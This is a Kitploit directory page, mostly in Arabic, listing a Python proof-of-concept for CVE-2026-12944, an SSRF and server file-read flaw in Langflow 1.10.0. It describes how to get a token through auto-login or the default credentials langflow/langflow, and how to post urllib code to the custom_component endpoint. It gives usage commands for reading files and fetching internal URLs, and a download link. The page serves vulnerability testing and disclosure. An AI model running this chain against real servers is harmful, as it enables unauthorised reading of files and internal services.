Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-12944 — Python PoC لـ CVE-2026-12944، ثغرة SSRF عبر urllib وقراءة الملفات في Langflow 1.10.0. يحدد الإصدارات ويستغل نقطة النهاية custom_component. | Kitploit
أدوات/GitHubGitHub/cflowsec/cve-2026-12944
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubcflowsec/cve-2026-12944

CVE-2026-12944

Python PoC لـ CVE-2026-12944، ثغرة SSRF عبر urllib وقراءة الملفات في Langflow 1.10.0. يحدد الإصدارات ويستغل نقطة النهاية custom_component.

عرض المستودع
منذ 13س 38دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-12944

Langflow 1.10.0 urllib SSRF

Langflow OSS ≤ 1.10.0 — تنفيذ كود عبر مكوّن مخصص باستخدام urllib.request / socket. قائمة الحظر الخاصة بماسح المكوّنات أغفلت هاتين الوحدتين من المكتبة القياسية. أصلحتها IBM في 1.10.1.

تصنّفها IBM بـ PR:L. نقطة تنفيذ الكود هي POST /api/v1/custom_component وهذا الاستدعاء يحتاج إلى session cookie / bearer token. كيف يحصل هذا الـ PoC على واحد:

  1. --test لا يقوم بالمصادقة. فقط GET /api/v1/version (بالإضافة إلى GET / للتحقق من الاتصال).
  2. --read / --fetch يقومان بالمصادقة أولاً، ثم يرسلان POST للمكوّن.
  3. Langflow الافتراضي يحتوي على LANGFLOW_AUTO_LOGIN. يقوم السكربت بـ ، وإذا احتوى JSON على ، يرسل . بدون اسم مستخدم أو كلمة مرور.
GET /api/v1/auto_login
access_token
Authorization: Bearer …
  • إذا كان تسجيل الدخول التلقائي معطلاً (401/توكن فارغ)، يقوم بـ POST /api/v1/login مع --uname / --password بصيغة application/x-www-form-urlencoded (username, password). القيم الافتراضية هي langflow / langflow.
  • ثم POST /api/v1/custom_component مع {"code": …} الذي يستدعي urllib.request.urlopen(...).
  • --uname / --password موجودان فقط للخطوة 4. لا يُستخدمان في التثبيت الافتراضي.

    للاختبار المصرّح به فقط. لا تشغّل هذا ضد أنظمة لا تملكها أو لا تملك إذناً باختبارها.

    يتطلب: Python 3، المكتبة القياسية فقط.

    root@kitploit:~
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --test
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --read /etc/hostname
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u http://TARGET --fetch http://127.0.0.1:7860/api/v1/version
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u https://TARGET --read /etc/hostname --insecure
    python3 cve-2026-12944-langflow-urllib-ssrf.py -u TARGET --uname langflow --password langflow --read /etc/hostname
    
    الخيارما يفعله
    -u / --urlعنوان Langflow الأساسي (مطلوب). http:// أو https://. اسم مضيف بدون بروتوكول يُجرَّب أولاً كـ HTTPS، ثم HTTP. إعادة توجيه http→https تحافظ على POST. شهادات TLS السيئة يُعاد المحاولة بدون تحقق؛ --insecure يتخطى التحقق من البداية
    --testبصمة فقط: GET /api/v1/version (عام). بدون تسجيل دخول، بدون custom_component
    --read PATHإطلاق الأداة: قراءة file:// عبر urllib.request للمسار PATH (يُنفَّذ على الخادم)
    --fetch URLSSRF: urllib.request.urlopen(URL) وطباعة المحتوى
    --uname / --passwordفقط إذا كان AUTO_LOGIN معطلاً (القيم الافتراضية: langflow / langflow)
    --insecureتخطي التحقق من TLS
    --timeoutمهلة HTTP بالثواني (افتراضي 30)

    نقطة نهاية --test: GET /api/v1/version. استجابة 200 مع "version" / "main_version" تطبع VERSION، ثم IN_WINDOW إذا كانت السلسلة بين 1.0.0–1.10.0، ثم PRESENT. لا تصل أبداً إلى /api/v1/auto_login أو /api/v1/custom_component.

    --read / --fetch تصل إلى GET /api/v1/auto_login (أو POST /api/v1/login)، ثم POST /api/v1/custom_component.

    Stdout: VERSION, IN_WINDOW, OUT_OF_WINDOW, PRESENT, VULNERABLE, NEED_AUTH, NOT_FOUND, NOT_VULNERABLE, READ.

    Working PoC

    CVE: CVE-2026-12944. نشرة IBM؛ قم بالترقية إلى 1.10.1.

    تنزيل الأداة